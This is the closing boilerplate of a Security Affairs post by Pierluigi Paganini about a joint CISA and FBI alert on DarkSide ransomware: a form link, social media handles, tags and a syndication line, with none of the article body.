https://docs.google.com/forms/d/e/1FAIpQLSer_6yOZrL8OO6XjJ9yj3Mlq9LvuOakdTZN9ZmhkFCy1aQLdw/viewform

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, DarkSide)

The post US CISA and FBI publish joint alert on DarkSide ransomware appeared first on Security Affairs.

❌